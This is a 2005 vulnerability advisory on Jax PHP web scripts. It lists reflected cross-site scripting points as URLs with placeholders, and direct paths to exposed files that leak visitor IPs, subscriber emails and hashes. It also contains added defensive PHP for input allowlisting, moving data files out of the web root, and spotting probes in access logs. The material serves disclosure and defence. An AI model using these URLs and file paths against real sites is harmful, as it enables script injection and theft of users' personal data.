############################################
Jax PHP Scripts multiple vulnerabilities
vendor url: http://www.jtr.de/scripting/php/
Advisory: http://lostmon.blogspot.com/2005/08/jax-php-scripts-multiple.html
vendor notify: yes    exploit available: yes
OSVDB ID: 18568,18569,18570,18571,18572,18573,18574,18575,18576,18577,18578,18579,18580,18581,18582,18583,18584,18585,18586
Secunia: SA16332,SA16333,SA16337,SA16338
BID: 14481
#############################################
###########
summary:
###########
0- Description.
1- Products affected.
2- Jax Guestbook report.
3- Jax Petitionbook report.
4- Jax Newsletter report.
5- Jax LinkLists report.
6- Jax Calendar report.
7- Jax DWT Editor report.
8- Timeline
###############
0- Description
###############
Jax scripts is a collection of useful PHP scripts to add to or include in a web site.
Jax Guestbook (GPL)* ==> PHP script for running a WWW guestbook
Jax Petitionbook (GPL)* ==> adaptation of Jax Guestbook for running a WWW petition book
Jax Newsletter (GPL)* ==> PHP script for running online mailing lists / newsletters (Mailing List Manager)
Jax LinkLists (GPL)* ==> PHP script for running simple hyperlink lists (Hyperlink Manager)
Jax Calendar (GPL)* ==> PHP script for running a simple web calendar (Calendar Manager)
Jax DWT Editor (GPL)* ==> PHP script for editing HTML files based on Dreamweaver templates (Template Editor)
###################
1- Products affected
###################
Jax Guestbook ==> Cross-Site Scripting and information disclosure.
Jax Petitionbook ==> Cross-Site Scripting and information disclosure.
Jax Newsletter ==> Cross-Site Scripting and information disclosure.
Jax LinkLists ==> Cross-Site Scripting and information disclosure.
Jax Calendar ==> Cross-Site Scripting.
Jax DWT Editor ==> Cross-Site Scripting.
##################
2- Jax Guestbook
##################
Cross-Site Scripting and information disclosure:
http://[victim]/guestbook/jax_guestbook.php?page=2&language=english&guestbook_id=0&gmt_ofs=0[XSS-CODE]
http://[victim]/jax_guestbook.php?page=2&language=english[XSS-CODE]&guestbook_id=0&gmt_ofs=0
http://[victim]/guestbook/jax_guestbook.php?page=2[XSS-CODE]&language=english&guestbook_id=0&gmt_ofs=0
http://[victim]/guestbook/jax_guestbook.php?mailto=9aa43a5efc2585681c97993d777bcd41&language=english[XSS-CODE]
http://[victim]/guestbook/guestbook
// IP addresses of the clients who have signed the guestbook
http://[victim]/guestbook/guestbook_ips2block
// list of banned IPs
http://[victim]/guestbook/ips2block
// list of banned IPs
http://[victim]/guestbook/formmailer/logfile.csv
// IPs of the users who sent messages via the formmail.php script
################
versions
###############
Jax Guestbook v3.1
Jax Guestbook v3.31
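The guestbook URLs above all show one pattern: a query parameter (page, language, guestbook_id, gmt_ofs) is copied into the generated HTML, so whatever is appended to it lands in the page. The PHP below is an added example and not Jax code; it contrasts that pattern with a hardened handler that casts the numeric parameters, allowlists the language name against an assumed set of shipped language files, and encodes the result for the attribute context. The function names, the LANGUAGES constant and the "next page" link being built are hypothetical.

```php
<?php
// Added example, not Jax code: the reflected-parameter pattern behind the XSS
// findings, as a vulnerable handler next to a hardened one. The parameter names
// are the advisory's; the "next page" link it builds is hypothetical.
declare(strict_types=1);

// Vulnerable: raw query-string values are concatenated into HTML, so a value
// such as  english"><i>x</i>  closes the href attribute and injects markup.
function render_next_link_vulnerable(array $get): string
{
    $page        = $get['page'] ?? '1';
    $language    = $get['language'] ?? 'english';
    $guestbookId = $get['guestbook_id'] ?? '0';
    $gmtOfs      = $get['gmt_ofs'] ?? '0';
    return '<a href="jax_guestbook.php?page=' . $page . '&language=' . $language
        . '&guestbook_id=' . $guestbookId . '&gmt_ofs=' . $gmtOfs . '">next</a>';
}

// Assumed set of shipped language files; anything else falls back to the default.
const LANGUAGES = ['english', 'german', 'spanish'];

function render_next_link_hardened(array $get): string
{
    // Numeric parameters: cast and range-check, never echo the raw string.
    $page        = max(1, (int)($get['page'] ?? 1));
    $guestbookId = max(0, (int)($get['guestbook_id'] ?? 0));
    $gmtOfs      = max(-12, min(14, (int)($get['gmt_ofs'] ?? 0)));

    // Enumerated parameter: allowlist it, do not try to sanitise it.
    $language = $get['language'] ?? 'english';
    $language = is_string($language) ? strtolower($language) : 'english';
    if (!in_array($language, LANGUAGES, true)) {
        $language = 'english';
    }

    // URL-encode the query, then HTML-encode it for the attribute context.
    $query = http_build_query([
        'page'         => $page + 1,
        'language'     => $language,
        'guestbook_id' => $guestbookId,
        'gmt_ofs'      => $gmtOfs,
    ]);
    return '<a href="jax_guestbook.php?'
        . htmlspecialchars($query, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '">next</a>';
}

// Constructed request in the advisory's  language=english[XSS-CODE]  shape.
$probe = ['page' => '2', 'language' => 'english"><i>x</i>', 'guestbook_id' => '0', 'gmt_ofs' => '0'];
echo render_next_link_vulnerable($probe), "\n"; // the <i> tag reaches the browser verbatim
echo render_next_link_hardened($probe), "\n";   // language falls back to english; the link stays intact
```

The allowlist is the important part: the language value selects a file to include, so it has a small, known set of valid values and there is no reason to reflect anything outside that set. Encoding alone would stop the markup but would still let the script try to load a language file that does not exist.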
###################
3- Jax Petitionbook
###################
Cross-Site Scripting and information disclosure:
http://[victim]/petitionbook/shrimp_petition.php?page=3&language=English&guestbook_id=0&gmt_ofs=0[XSS-CODE]
http://[victim]/petitionbook/shrimp_petition.php?page=3&language=English[XSS-CODE]&guestbook_id=0&gmt_ofs=0
http://[victim]/petitionbook/shrimp_petition.php?page=3[XSS-CODE]&language=English&guestbook_id=0&gmt_ofs=0
http://[victim]/petitionbook/formmailer.log
// every IP and message that users sent via formmail
http://[victim]/petitionbook/ips2block
// all banned IPs
http://[victim]/petitionbook/petitionbook
// IPs of everyone who has signed the petition
#################
4- Jax Newsletter
#################
Cross-Site Scripting and information disclosure:
http://[victim]/newsletter/jax_newsletter.php?language=German[XSS-CODE]&ml_id=1
http://[victim]/newsletter/sign_in.php?do=sign_in&language=german[XSS-CODE]&ml_id=1&ml_id=1
http://[victim]/newsletter/archive.php?language=spanish[XSS-CODE]
http://[victim]/newsletter/logs/jnl_records
// information disclosure of user data: a direct request to this file reveals
// "email","hash","mail_format","gender","nick","mode","groups","action","time","ip","age","profession","nationality"
// for every registered user.
############
versions
############
Jax Newsletter v2.14
Jax Newsletter v2.10
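The file disclosures in the guestbook, petition book and newsletter sections (guestbook, ips2block, logfile.csv, formmailer.log, jnl_records) have one cause: the scripts write their flat data files inside the document root, where the web server serves them like any other static file. The PHP below is an added example, not Jax code, showing how an installation can keep such files outside the web root, check that a data path is not web-reachable before writing to it, and, where the files cannot be moved, drop an Apache .htaccess into the data directory that refuses direct requests. The document root, the jax_data directory name and the function names are assumptions; PHP 8 is assumed for str_starts_with.

```php
<?php
// Added example, not Jax code. Every file disclosure in this advisory comes
// from data files written inside the document root. Names here (jax_data_path,
// web_reachable, protect_data_dir, the jax_data directory) are hypothetical.
declare(strict_types=1);

// Path for a data file in a directory one level above the document root
// (e.g. /var/www/jax_data for a docroot of /var/www/html).
function jax_data_path(string $docroot, string $file, ?string $dataDir = null): string
{
    if ($file === '' || basename($file) !== $file) {
        // no separators and no "..": data files are bare names only
        throw new InvalidArgumentException("data file must be a bare filename: $file");
    }
    $dataDir ??= dirname(rtrim($docroot, '/')) . '/jax_data';
    return rtrim($dataDir, '/') . '/' . $file;
}

// True when $path resolves to somewhere under $docroot, i.e. the web server
// could hand it out as a static file. Not-yet-created paths are checked via
// their nearest existing ancestor; an unresolvable path counts as reachable.
function web_reachable(string $docroot, string $path): bool
{
    $root = realpath($docroot);
    if ($root === false) {
        throw new RuntimeException("document root not found: $docroot");
    }
    $probe = $path;
    while (($real = realpath($probe)) === false && dirname($probe) !== $probe) {
        $probe = dirname($probe);
    }
    if ($real === false) {
        return true;
    }
    return $real === $root || str_starts_with($real, rtrim($root, '/') . '/');
}

// Defence in depth for installs that cannot move the files: an Apache
// .htaccess in the data directory that refuses every direct request
// (2.4 syntax first, 2.2 syntax for older servers).
function protect_data_dir(string $dataDir): void
{
    if (!is_dir($dataDir) && !mkdir($dataDir, 0700, true)) {
        throw new RuntimeException("cannot create $dataDir");
    }
    $rules = "<IfModule mod_authz_core.c>\n  Require all denied\n</IfModule>\n"
           . "<IfModule !mod_authz_core.c>\n  Order deny,allow\n  Deny from all\n</IfModule>\n";
    if (file_put_contents($dataDir . '/.htaccess', $rules, LOCK_EX) === false) {
        throw new RuntimeException("cannot write $dataDir/.htaccess");
    }
}

// Usage: the newsletter's subscriber records, which the advisory found at
// /newsletter/logs/jnl_records under the web root. The docroot is assumed.
try {
    $docroot = '/var/www/html';
    $records = jax_data_path($docroot, 'jnl_records');   // /var/www/jax_data/jnl_records
    if (web_reachable($docroot, $records)) {
        throw new RuntimeException("refusing to store subscriber records inside the web root: $records");
    }
    protect_data_dir(dirname($records));
    // constructed header line standing in for the script's real record format
    file_put_contents($records, "\"email\",\"hash\",\"ip\"\n", FILE_APPEND | LOCK_EX);
} catch (RuntimeException $e) {
    fwrite(STDERR, $e->getMessage() . "\n");
    exit(1);
}
```

The placement check is the primary control: a file that is not under the document root cannot be served no matter how the web server is configured. The .htaccess is only a backstop; it takes effect on Apache when AllowOverride permits it for that directory and does nothing on other web servers.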
#################
5- Jax LinkLists
#################
Cross-Site Scripting and information disclosure:
http://[victim]/linklists/jax_linklists.php?language=English[XSS-CODE]
http://[victim]/linklists/jax_linklists.php?do=list&list_id=0&language=english&cat=Religion[XSS-CODE]
http://[victim]/linklists/suggestions.csv
// a direct request discloses the IP of every client who has suggested a link
#############
versions
#############
Jax LinkLists v1.1
Jax LinkLists v1.0
#################
6- Jax Calendar
#################
Cross-Site Scripting:
http://[victim]/calendar/jax_calendar.php?Y=2005[XSS-CODE]&m=8&d=2&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_id=0&language=spanish&gmt_ofs=0&view=d30&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_title=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Feld
http://[victim]/calendar/jax_calendar.php?Y=2005&m=8[XSS-CODE]&d=2&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_id=0&language=spanish&gmt_ofs=0&view=d30&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_title=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Feld
http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2[XSS-CODE]&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_id=0&language=spanish&gmt_ofs=0&view=d30&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_title=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Feld
http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_id=0[XSS-CODE]&language=spanish&gmt_ofs=0&view=d30&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_title=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Feld
http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_id=0&language=spanish[XSS-CODE]&gmt_ofs=0&view=d30&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_title=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Feld
http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_id=0&language=spanish&gmt_ofs=0[XSS-CODE]&view=d30&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_title=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Feld
http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_id=0&language=spanish&gmt_ofs=0&view=d30[XSS-CODE]&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_title=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Feld
http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_id=0&language=spanish&gmt_ofs=0&view=d30&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00[XSS-CODE]&evt_title=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Feld
http://[victim]/calendar/jax_calendar.php?Y=2005&m=8&d=2&do=show_event&key=db6165c8fd09437c00badaf419eb0db5&cal_id=0&language=spanish&gmt_ofs=0&view=d30&evt_date=29.07.2005+10%3A00+-%3Cbr%3E09.10.2005+18%3A00&evt_title=Karlsruhe+-+Ausstellung%3A+K%F6rper+im+elektromagnetischen+Feld[XSS-CODE]
http://[victim]/calendar/jax_calendar.php?&Y=2005&m=8&d=2&cal_id=0&language=spanish&gmt_ofs=0&view=d30&view=m12[XSS-CODE]
// all variables affected by XSS flaws
http://[victim]/calendar/modules/eventlist.inc.php?&Y=2005&m=8&d=2&cal_id=0&language=german&gmt_ofs=-1&view=d30&view=d1[XSS-CODE]
// all variables affected by XSS flaws
http://[victim]/calendar/modules/calendar.inc.php?Y=2013&m=8&d=2&cal_id=0&language=german&gmt_ofs=-1&view=d30
// all variables affected by XSS flaws
##############
versions
##############
Jax Calendar 1.34
Jax Calendar 1.33
#################
7- Jax DWT Editor
#################
Cross-Site Scripting:
http://[victim]/dwt_editor/dwt_editor.php?language=english[XSS-CODE]&cur_dir=%2Fscripting%2Fphp%2Fdwteditor%2Fdwt_editor
http://[victim]/dwt_editor/dwt_editor.php?language=english&cur_dir=[XSS-CODE]%2Fscripting%2Fphp%2Fdwteditor%2Fdwt_editor
http://[victim]/dwt_editor/dwt_editor.php?do=editarea&cur_dir=%2Fscripting%2Fphp%2Fdwteditor%2Fdwt_editor%2Ffiles%2Fzweit+ebene&file=5db14c3963eff6b87ce20155708fd867&language=german&area=textbereich2[XSS-CODE]
##############
versions
##############
Jax DWT Editor v1.0
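For administrators who want to know whether an existing install has already been probed, the two request shapes in this advisory are easy to spot in web server logs: fetches of the data files by their fixed paths, and reflected parameters carrying markup. The PHP script below is an added example, not part of the advisory or of Jax, that parses Apache combined-format access log lines and flags both. The log lines are constructed and the IPs are documentation addresses; the file and parameter lists are taken from the URLs in this advisory.

```php
<?php
// Added example, not part of the advisory or of Jax: review Apache combined-
// format access logs for the two request shapes this advisory describes.
// The log lines at the bottom are constructed; IPs are documentation addresses.
declare(strict_types=1);

// Data files the advisory shows being served directly, keyed by request path.
const DATA_FILES = [
    '/guestbook/guestbook', '/guestbook/guestbook_ips2block', '/guestbook/ips2block',
    '/guestbook/formmailer/logfile.csv', '/petitionbook/formmailer.log',
    '/petitionbook/ips2block', '/petitionbook/petitionbook',
    '/newsletter/logs/jnl_records', '/linklists/suggestions.csv',
];

// Parameters the advisory lists as reflected. evt_date is left out on purpose:
// the calendar's own links carry %3Cbr%3E in it, so it would always trip the check.
const REFLECTED_PARAMS = ['page', 'language', 'guestbook_id', 'gmt_ofs', 'ml_id', 'cat',
    'Y', 'm', 'd', 'view', 'cal_id', 'key', 'evt_title', 'cur_dir', 'file', 'area'];

// Split one combined-log line into the fields the checks need; null if it does not parse.
function parse_log_line(string $line): ?array
{
    if (!preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) /', $line, $m)) {
        return null;
    }
    $parts = parse_url($m[3]);
    if ($parts === false) {
        return null;
    }
    return [
        'client' => $m[1],
        'method' => $m[2],
        'path'   => $parts['path'] ?? '',
        'query'  => $parts['query'] ?? '',
        'status' => (int)$m[4],
    ];
}

// Findings for one request: a direct data-file fetch, and/or markup in a reflected parameter.
function classify(array $req): array
{
    $findings = [];
    if (in_array($req['path'], DATA_FILES, true)) {
        $findings[] = 'data-file-request';
    }
    parse_str($req['query'], $params);           // percent-decodes the values for us
    foreach (REFLECTED_PARAMS as $name) {
        $value = $params[$name] ?? null;
        if (is_string($value) && preg_match('/[<>"\']|javascript:/i', $value)) {
            $findings[] = "markup-in-param:$name";
        }
    }
    return $findings;
}

// Run every line through the checks and keep only those that produced findings.
function review_log(array $lines): array
{
    $report = [];
    foreach ($lines as $line) {
        $req = parse_log_line($line);
        if ($req === null) {
            continue;
        }
        $hits = classify($req);
        if ($hits !== []) {
            $report[] = ['client' => $req['client'], 'status' => $req['status'],
                         'path' => $req['path'], 'hits' => $hits];
        }
    }
    return $report;
}

// Constructed sample: one normal page view, one probe against the language
// parameter, one direct fetch of the newsletter subscriber file.
$sample = [
    '203.0.113.7 - - [05/Aug/2005:10:01:02 +0200] "GET /guestbook/jax_guestbook.php?page=2&language=english&guestbook_id=0&gmt_ofs=0 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [05/Aug/2005:10:01:09 +0200] "GET /guestbook/jax_guestbook.php?page=2&language=english%22%3E%3Cb%3Ex%3C%2Fb%3E&guestbook_id=0&gmt_ofs=0 HTTP/1.1" 200 5209 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [05/Aug/2005:10:02:40 +0200] "GET /newsletter/logs/jnl_records HTTP/1.1" 200 18231 "-" "curl/7.13"',
];
foreach (review_log($sample) as $f) {
    printf("%-14s %3d %-36s %s\n", $f['client'], $f['status'], $f['path'], implode(', ', $f['hits']));
}
```

Only the second and third sample lines produce findings; the first is a normal page view. The status code is kept in the report because a 200 on a data-file path means the file was actually handed out, whereas a 403 or 404 shows the request was refused.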
###################
8- Timeline
###################
discovered: 27-07-2005
vendor notify: 04-08-2005
vendor response: 04-08-2005
disclosure: 05-08-2005
#################### €nd #############################
Thnx to estrella for being my light.
--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what makes the mind move....